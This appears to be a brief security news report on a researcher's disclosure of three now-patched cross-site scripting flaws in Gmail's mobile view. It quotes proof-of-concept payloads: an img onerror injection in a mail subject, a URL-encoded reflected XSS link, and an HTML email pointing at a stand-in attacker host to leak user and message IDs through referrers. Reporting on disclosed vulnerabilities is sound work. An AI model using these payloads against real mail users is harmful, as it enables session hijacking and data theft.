A security Researcher Nils Junemann discovered persistent cross-site scripting (XSS) vulnerabilities in Gmail and notified Google before few moths, Google patched the vulnerabilities now.
According to his blog post, Junemann found three different XSS vulnerabilities in Gmail. The first security flaw is "Persistent DOM XSS (innerHTML) in Gmail's mobile view" :
A incoming mail containing <img src=x onerror=prompt(1)> within the subject and forwarded to another user, has lead to XSS.
The second one is very simple non-persistent XSS in Gmail's mobile view:
https://mail.google.com/mail/ mu/#cv/search/%22%3E%3Cimg% 20src%3Dx%20onerror%3Dalert(2) %3E/foobar
The third security issue is very intersting persistent XSS. He discovered that there was a way for an attacker to get access to several key pieces of information in the URLs that Gmail generates when it displays a message to a user.
When a message is displayed directly, rather than as part of a user's inbox, it contains both a static user ID and an identifier for the individual message. Those values shouldn't be available to an attacker, but Juenemann found that he could get them through referrer leaks.
"An attacker doesn't know the ik and the message id . Without both values it's not possible to generate the special URL. But it's easy to get both values through referer leaking.
We have to send to our victim a HTML e-mail with that content:
<img src=" https://attackershost.com/1x1.gif " >When the user opens the email message, the GIF image will send the user ID and message ID to theattacker's server. The second URL also will leak that data if the user clicks on it. The script will then display a Javascript alert, and that's the attacker's code runningin the context of Gmail.
<a href=" https://attackershost.com/gmailxss ">Click here to have fun</a>
<script>alert(/xss/)</script>
